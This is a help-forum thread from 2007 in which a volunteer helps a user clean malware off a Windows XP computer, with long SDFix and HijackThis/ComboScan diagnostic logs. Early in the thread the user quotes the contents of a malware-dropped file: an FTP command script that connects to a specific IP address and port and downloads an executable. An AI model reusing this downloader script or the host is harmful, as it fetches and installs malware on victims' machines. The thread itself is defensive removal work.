MS Windows XP will not load when connected to internet - Page 4

Ried · 03-19-2007, 09:42 AM

Quote:

C:\WINDOWS\System32\3718845C.exe
C:\WINDOWS\system32\i
**** This was a file ****
** Contents
I can not find, looks like it was deleted
It did contain an IP address **

Which one contained an IP address?

cul8rman · 03-19-2007, 07:32 PM

Which one contained an IP address?

It was in C:\WINDOWS\system32\i

I tried searching for it and it is back. Here are the contents of "I"

open 130.13.166.123 27067
user 1 1
get setup_01505.exe
quit

Maybe it is not an IP Address, but to me it looked like one. I am suprised that the file is back, I deleted it and did not find it yesterday.

Ried · 03-19-2007, 08:04 PM

Yes, that is an IP address--good eye.

Have you followed my instructions just before I inquired about that file and IP address?

cul8rman · 03-19-2007, 10:16 PM

Contents of Report.txt
*********************

SDFix: Version 1.69

Run by Duane - Mon 03/19/2007 @ 20:36:04.07

Microsoft Windows XP [Version 5.1.2600]

Running From: C:\Documents and Settings\Duane\Desktop\SDFix

Safe Mode:
Checking Services:

Restoring Windows Registry Entries
Restoring Default Hosts File

Rebooting...

Normal Mode:
Checking Files:

Below files will be copied to Backups folder then removed:

C:\WINDOWS\system32\i - Deleted
C:\WINDOWS\system32\setup_01505.exe - Deleted
C:\WINDOWS\system32\setup_03755.exe - Deleted
C:\WINDOWS\system32\setup_10548.exe - Deleted
C:\WINDOWS\system32\setup_42102.exe - Deleted

ADS Check:

C:\WINDOWS\system32
No streams found.

Final Check:

Remaining Services:
------------------

Authorized Application Key Export:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"

Remaining Files:
---------------

Backups Folder: - C:\DOCUME~1\Duane\Desktop\SDFix\backups\backups.zip

Checking For Files with Hidden Attributes :

C:\Program Files\Common Files\aolshare\shell\us\shellext.dll
C:\Program Files\Common Files\csshare\shell\us\shellext.dll
C:\My Games\Action Ball\actionball.exe
C:\My Games\Adventure Ball\AdventureBall.exe
C:\My Games\Aqua Pearls\pearls.exe
C:\My Games\Cactus Bruce and the Corporate Monkeys\RealCB12.exe
C:\My Games\Clash 'N Slash\Clash N Slash.exe
C:\My Games\Flying Leo\FlyingLeo.exe
C:\My Games\Icy Spell\IcySpell.exe
C:\My Games\Impact\Impact.exe
C:\My Games\Inspheration\Inspheration.exe
C:\My Games\Jewel of Atlantis\Jewel of Atlantis.exe
C:\My Games\Mirror Magic\mirrormagic.exe
C:\My Games\Mosaic - Tomb of Mystery\Mosaic.exe
C:\My Games\Phlinx to Go\PhlinxToGo.exe
C:\My Games\Rainbow Web\RainbowWeb.exe
C:\My Games\Snowy - Space Trip\SpaceTrip.exe
C:\My Games\Turtle Odyssey\Game.exe
C:\My Games\Wheel of Fortune\Wheel of Fortune.exe
C:\Program Files\America Online 8.0\aolphx.exe
C:\Program Files\America Online 8.0\aoltray.exe
C:\Program Files\America Online 8.0\RBM.exe
C:\Program Files\America Online 8.0\waol.exe
C:\Program Files\America Online 8.0\COMIT\cswitch.exe
C:\Program Files\CompuServe 7.0\csphx.exe
C:\Program Files\CompuServe 7.0\cstray.exe
C:\Program Files\CompuServe 7.0\RBM.exe
C:\Program Files\CompuServe 7.0\wcs2000.exe
C:\Program Files\CompuServe 7.0\COMIT\cswitch.exe
C:\Program Files\Picasa2\setup.exe
C:\WINDOWS\system32\config\system.tmp.LOG

Add/Remove Programs List:

1Click DVD Copy 4.2.9.2
3D Snowy Cottage Screen Saver
Ad-Aware SE Personal
Adobe Acrobat 4.0
Agfa ePhoto CL18 Digital Camera Driver
America Online
AOL Instant Messenger (SM)
AOL Coach Version 1.0(Build:20020823.1)
AVG 7.5
AVG Anti-Spyware 7.5
BadCopy Pro
Belarc Advisor 7.0
BigFix
Calm Before the Storm Screen Saver
Chess Live 4.2
Cinema Tycoon(TM) Gold
CleanUp!
Conexant SoftK56 Modem(M)
CompuServe
Codec Pack - All In 1 6.0.2.7
Cox Online Support Controls
EPSON Printer Software
EZBack-it-up 2.0.1
Fiber Twig 2: Restoration of Magic Garden
Fish Tycoon
Fortune Tiles(TM) Gold
FREE Hi-Q Recorder 1.9
Gem Shop
Google Desktop Search
Gum Droppers
Hexalot
High Flying Act - Interactive Storybook
HijackThis 1.99.1
ICQ
iTunes
Karu
Microsoft Data Access Components KB870669
Lavasoft VX2 Cleaner
LEGO Chess
Macromedia Shockwave Player
CloneDVD 4.0
Micro Innovations Wireless Keyboard
Micro Innovations Wireless Optical Mouse
Mozilla Firefox (2.0.0.2)
MSN Music Assistant
Netscape 6 (6.2.1)
Panda ActiveScan
PC Pitstop Optimize 1.5
Picasa 2
QuickTime
Reader Rabbit 1st Grade
Reader Rabbit 1st Grade(R) Capers on Cloud Nine!(TM)
Reader Rabbit Thinking Adventures Ages 4-6
Reader Rabbit(R) I Can Read! With Phonics
RealArcade
RealPlayer
RegistryFix v3.0
Reader Rabbit's 2nd Grade
Sandlot Games Client Services
Macromedia Flash Player 8
SimCity 3000
Splash
Spybot - Search & Destroy 1.4
IncBack +
SurferNETWORK Player
SyncBackSE
Viewpoint Media Player (Remove Only)
WeatherBug
Winamp (remove only)
Yahoo! Toolbar
Yahoo! Toolbar
Zulu Gems
Microsoft Money 2003
Microsoft Money 2003 System Pack
PC Inspector File Recovery
The Sims Deluxe Edition
Norton WMI Update
Google Toolbar for Internet Explorer
Java(TM) SE Runtime Environment 6
DataRobot Premium
Stomp Backup MyPC
MaxBlast 4
PowerDVD
Windows Backup Utility
EPSON Web-To-Page
Mirror Magic
NetZero For Riverdeep
iTunes
Intel(R) Extreme Graphics Driver
Microsoft Office Excel Viewer 2003
Microsoft Office Word Viewer 2003
Adobe Reader 7.0.7
DV 4100M
HP Software Update
Ulead Photo Express 4.0 SE
Texas Hold 'Em: High Stakes Poker
Ulead Photo Explorer 8.0 SE Basic
Disney's Phonics Quest
Greeting Card Factory Express
Sygate Personal Firewall
Microsoft Works 6.0
HP Deskjet 3740
Realtek AC'97 Audio
Multimedia Keyboard Driver

Finished
*********************
I found one, it is dated today and is named
Setup_63032.exe
File size 0
**************************

I will leave the system running

**************************

Ried · 03-19-2007, 10:31 PM

Ok, while it's still up--run an new scan with ComboScan.exe (not combofix.exe) and post the log here. Do not reboot.

cul8rman · 03-19-2007, 11:06 PM

ComboScan v20070306.20 run by Duane on 2007-03-19 at 21:58:40
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- HijackThis (run as Duane.exe) -----------------------------------------------

HijackThis failed to provide a log after three minutes; running clone instead.
-- HijackThis Clone ------------------------------------------------------------

Emulating logfile of HijackThis v1.99.1
Scan saved at 2007-03-19 22:01:40
Platform: Windows XP Service Pack 1 (5.01.2600)
MSIE: Internet Explorer (6.0.2800.1106)

Running processes:
C:\WINDOWS\system32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\Grisoft\AVG7\avgamsvr.exe
C:\Program Files\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Grisoft\AVG7\avgemc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\wanmpsvc.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\ftp.exe
C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\monitor.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb10.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\Hewlett-Packard\HP Software Update\hpwuSchd2.exe
C:\Program Files\Picasa2\PicasaMediaDetector.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Grisoft\AVG7\avgcc.exe
C:\Program Files\Micro Innovations\Keyboard\KBDAP32A.EXE
C:\Program Files\Micro Innovations\Mouse\mouse32a.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Java\jre1.6.0\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\BigFix\BigFix.exe
C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe
C:\Program Files\HP\hpcoretech\comp\hptskmgr.exe
C:\Documents and Settings\Duane\Desktop\comboscan.exe
C:\Program Files\Hijack This\Duane.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.emachines.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {243B17DE-77C7-46BF-B94B-0B5F309A0E64} - C:\Program Files\Microsoft Money\System\mnyside.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\GoogleToolbar3.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\system32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\GoogleToolbar3.dll
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SSC_UserPrompt] C:\Program Files\Common Files\Symantec Shared\Security Center\UsrPrmpt.exe
O4 - HKLM\..\Run: [Ulead AutoDetector] C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb10.exe
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [OFFICEKB] C:\Program Files\Micro Innovations\Keyboard\kbdap32a.EXE
O4 - HKLM\..\Run: [FLMOFFICE4DMOUSE] C:\Program Files\Micro Innovations\Mouse\mouse32a.exe
O4 - HKLM\..\Run: [PC Pitstop Optimize Scheduler] C:\Program Files\PCPitstop\Optimize\PCPOptimize.exe -boot
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0\bin\jusched.exe"
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Microsoft Works Update Detection] c:\Program Files\Microsoft Works\WkDetect.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: BigFix.lnk = C:\Program Files\BigFix\BigFix.exe
O4 - Global Startup: Ulead Photo Express 4.0 SE Calendar Checker .lnk = C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://c:\program files\google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://c:\program files\google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\Icq.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\Icq.exe
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (file missing)
O9 - Extra 'Tools' menuitem: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (file missing)
O9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyside.dll
O9 - Extra 'Tools' menuitem: (no name) - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyside.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: Video Poker () - http://download.games.yahoo.com/game...s/y/vpt0_x.cab
O16 - DPF: Yahoo! Backgammon () - http://download.games.yahoo.com/game...ts/y/at1_x.cab
O16 - DPF: Yahoo! Bingo () - http://download.games.yahoo.com/game...ts/y/xt0_x.cab
O16 - DPF: Yahoo! Blackjack () - http://download.games.yahoo.com/game...ts/y/jt0_x.cab
O16 - DPF: Yahoo! Checkers () - http://download.games.yahoo.com/game...ts/y/kt4_x.cab
O16 - DPF: Yahoo! Chess () - http://download.games.yahoo.com/game...ts/y/ct2_x.cab
O16 - DPF: Yahoo! Cribbage () - http://download.games.yahoo.com/game...ts/y/it1_x.cab
O16 - DPF: Yahoo! Dice () - http://download.games.yahoo.com/game...s/y/dct4_x.cab
O16 - DPF: Yahoo! Go Fish () - http://download.games.yahoo.com/game...ts/y/zt3_x.cab
O16 - DPF: Yahoo! Klondike Solitaire () - http://presence.games.yahoo.com/yog/y/ks12_x.cab
O16 - DPF: Yahoo! Poker () - http://download.games.yahoo.com/game...ts/y/pt3_x.cab
O16 - DPF: Yahoo! Pyramids () - http://download.games.yahoo.com/game...s/y/pyt1_x.cab
O16 - DPF: {0000000A-0000-0010-8000-00AA00389B71} () - http://download.microsoft.com/downlo...367/wmavax.CAB
O16 - DPF: {01113300-3E00-11D2-8470-0060089874ED} (Support.com Configuration Class) - http://support.cox.com/sdccommon/download/tgctlcm.cab
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/viewers/ipixx.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://active.macromedia.com/director/cabs/sw.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} () - http://download.microsoft.com/downlo...22/wmv9VCM.CAB
O16 - DPF: {4620BC29-8B8E-4F4E-9D92-1DB6633D6793} (SurferNETWORK Plugin) - http://rd1.surfernetwork.com/surferplugin.ocx
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} () - http://software-dl.real.com/14939218...p/RdxIE601.cab
O16 - DPF: {62789780-B744-11D0-986B-00609731A21D} (Autodesk MapGuide ActiveX Control) - http://maricopa.gov/assessor/gis/plugin/mgaxctrl.cab
O16 - DPF: {7FE26BE2-B923-4B41-9834-E84DA1CC1F96} (Maid Control) - http://vsp.closetmaid.com/vsp/cmaidc...downloader.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/actives...ree/asinst.cab
O16 - DPF: {CC05BC12-2AA2-4AC7-AC81-0E40F83B1ADF} (Live365Player Class) - http://www.live365.com/players/play365.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload.macromedia.com/get...nt/swflash.cab
O16 - DPF: {D77EF652-9A6B-40C8-A4B9-1C0697C6CF41} (TikGames Online Control) - http://download.games.yahoo.com/game.../gpcontrol.cab
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - http://download.games.yahoo.com/game...ploader_v6.cab
O18 - Protocol: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files\Belarc\Advisor\System\BAVoilaX.dll
O18 - Protocol: cetihpz - {CF184AD3-CDCB-4168-A3F7-8E447D129300} - C:\Program Files\HP\hpcoretech\comp\hpuiprot.dll
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\System32\igfxsrvc.dll
O23 - Service: Alerter - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Application Layer Gateway Service (ALG) - C:\WINDOWS\system32\alg.exe
O23 - Service: Application Management (AppMgmt) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Windows Audio (AudioSrv) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: AVG Anti-Spyware Guard - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - C:\Program Files\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - C:\Program Files\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - C:\Program Files\Grisoft\AVG7\avgemc.exe
O23 - Service: Background Intelligent Transfer Service (BITS) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Computer Browser (Browser) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Indexing Service (CiSvc) - C:\WINDOWS\system32\cisvc.exe
O23 - Service: ClipBook (ClipSrv) - C:\WINDOWS\system32\clipsrv.exe
O23 - Service: COM+ System Application (COMSysApp) - C:\WINDOWS\System32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
O23 - Service: Cryptographic Services (CryptSvc) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: DHCP Client (Dhcp) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - C:\WINDOWS\System32\dmadmin.exe /com
O23 - Service: Logical Disk Manager (dmserver) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: DNS Client (Dnscache) - C:\WINDOWS\System32\svchost.exe -k NetworkService
O23 - Service: Error Reporting Service (ERSvc) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Event Log (Eventlog) - C:\WINDOWS\system32\services.exe
O23 - Service: COM+ Event System (EventSystem) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Fast User Switching Compatibility (FastUserSwitchingCompatibility) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Google Updater Service (gusvc) - "C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe"
O23 - Service: Help and Support (helpsvc) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Human Interface Device Access (HidServ) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: InstallDriver Table Manager (IDriverT) - "C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe"
O23 - Service: IMAPI CD-Burning COM Service (ImapiService) - C:\WINDOWS\system32\imapi.exe
O23 - Service: iPodService - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Server (lanmanserver) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Workstation (lanmanworkstation) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: TCP/IP NetBIOS Helper (LmHosts) - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Messenger - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: NetMeeting Remote Desktop Sharing (mnmsrvc) - C:\WINDOWS\system32\mnmsrvc.exe
O23 - Service: Distributed Transaction Coordinator (MSDTC) - C:\WINDOWS\system32\msdtc.exe
O23 - Service: Windows Installer (MSIServer) - C:\WINDOWS\System32\msiexec.exe /V
O23 - Service: Network DDE (NetDDE) - C:\WINDOWS\system32\netdde.exe
O23 - Service: Network DDE DSDM (NetDDEdsdm) - C:\WINDOWS\system32\netdde.exe
O23 - Service: Net Logon (Netlogon) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Network Connections (Netman) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Network Location Awareness (NLA) (Nla) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: NT LM Security Support Provider (NtLmSsp) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Removable Storage (NtmsSvc) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Office Source Engine (ose) - "C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
O23 - Service: Plug and Play (PlugPlay) - C:\WINDOWS\system32\services.exe
O23 - Service: IPSEC Services (PolicyAgent) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Protected Storage (ProtectedStorage) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Remote Access Auto Connection Manager (RasAuto) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Remote Access Connection Manager (RasMan) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Remote Desktop Help Session Manager (RDSessMgr) - C:\WINDOWS\system32\sessmgr.exe
O23 - Service: Routing and Remote Access (RemoteAccess) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Remote Procedure Call (RPC) Locator (RpcLocator) - C:\WINDOWS\system32\locator.exe
O23 - Service: Remote Procedure Call (RPC) (RpcSs) - C:\WINDOWS\system32\svchost -k rpcss
O23 - Service: QoS RSVP (RSVP) - C:\WINDOWS\system32\rsvp.exe
O23 - Service: Security Accounts Manager (SamSs) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Smart Card Helper (SCardDrv) - C:\WINDOWS\system32\scardsvr.exe
O23 - Service: Smart Card (SCardSvr) - C:\WINDOWS\system32\scardsvr.exe
O23 - Service: Task Scheduler (Schedule) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Secondary Logon (seclogon) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: System Event Notification (SENS) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Windows Firewall/Internet Connection Sharing (ICS) (SharedAccess) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Shell Hardware Detection (ShellHWDetection) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Sygate Personal Firewall (SmcService) - C:\Program Files\Sygate\SPF\Smc.exe
O23 - Service: Print Spooler (Spooler) - C:\WINDOWS\system32\spoolsv.exe
O23 - Service: System Restore Service (srservice) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: SSDP Discovery Service (SSDPSRV) - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Windows Image Acquisition (WIA) (stisvc) - C:\WINDOWS\System32\svchost.exe -k imgsvc
O23 - Service: MS Software Shadow Copy Provider (SwPrv) - C:\WINDOWS\System32\dllhost.exe /Processid:{195E6122-CAE8-4FC9-BD96-F81BBD1135E2}
O23 - Service: SymWMI Service (SymWSC) - "C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe"
O23 - Service: Performance Logs and Alerts (SysmonLog) - C:\WINDOWS\system32\smlogsvc.exe
O23 - Service: Telephony (TapiSrv) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Terminal Services (TermService) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Themes - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Distributed Link Tracking Client (TrkWks) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Windows User Mode Driver Framework (UMWdf) - C:\WINDOWS\system32\wdfmgr.exe
O23 - Service: Upload Manager (uploadmgr) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Universal Plug and Play Device Host (upnphost) - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Uninterruptible Power Supply (UPS) - C:\WINDOWS\system32\ups.exe
O23 - Service: Volume Shadow Copy (VSS) - C:\WINDOWS\system32\vssvc.exe
O23 - Service: Windows Time (W32Time) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - "C:\WINDOWS\wanmpsvc.exe"
O23 - Service: WebClient - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Windows Management Instrumentation (winmgmt) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Portable Media Serial Number Service (WmdmPmSN) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: WMI Performance Adapter (WmiApSrv) - C:\WINDOWS\system32\wbem\wmiapsrv.exe
O23 - Service: Automatic Updates (wuauserv) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Wireless Zero Configuration (WZCSVC) - C:\WINDOWS\System32\svchost.exe -k netsvcs

-- Files created between 2007-02-19 and 2007-03-19 -----------------------------

2007-03-19 21:14:12 0 d--h----- C:\WINDOWS\PIF
2007-03-19 20:55:17 0 --a------ C:\WINDOWS\System32\setup_63032.exe<SETUP_~1.EXE>
2007-03-18 22:27:49 80 --a------ C:\WINDOWS\gmer_uninstall.cmd<GMER_U~1.CMD>
2007-03-18 12

33 552 --a------ C:\Combo.bat
2007-03-18 09:51:51 77 --a------ C:\delete.reg
2007-03-13 20:51:18 136 --a------ C:\WINDOWS\System32\dgjun.bat
2007-03-12 18:20:25 491768 --a------ C:\ie6setup.exe
2007-03-11 22:17:35 0 d-------- C:\WINDOWS\System32\ActiveScan<ACTIVE~1>
2007-03-11 09:25:11 0 d-------- C:\Program Files\Java
2007-03-11 09:25:11 0 d-------- C:\Program Files\Common Files\Java
2007-03-11 09:24:21 0 d-------- C:\Documents and Settings\Duane\Application Data\Sun
2007-03-10 11:31:19 0 d-------- C:\Rustbfix
2007-03-08 19:56:44 0 d-------- C:\WINDOWS\ERDNT
2007-03-08 19:33:08 49152 --a------ C:\Documents and Settings\Duane\vfind.exe
2007-03-08 19:33:08 79360 --a------ C:\Documents and Settings\Duane\swxcacls.exe
2007-03-08 19:33:08 123904 --a------ C:\Documents and Settings\Duane\swsc.exe
2007-03-08 19:33:08 140800 --a------ C:\Documents and Settings\Duane\swreg.exe
2007-03-08 19:33:08 8192 --a------ C:\Documents and Settings\Duane\RestartIt.exe<RESTAR~1.EXE>
2007-03-08 19:33:08 6914 --a------ C:\Documents and Settings\Duane\Qoo.bat
2007-03-08 19:33:08 971 --a------ C:\Documents and Settings\Duane\Purity.bat
2007-03-08 19:33:08 39184 --a------ C:\Documents and Settings\Duane\Ntrights.exe
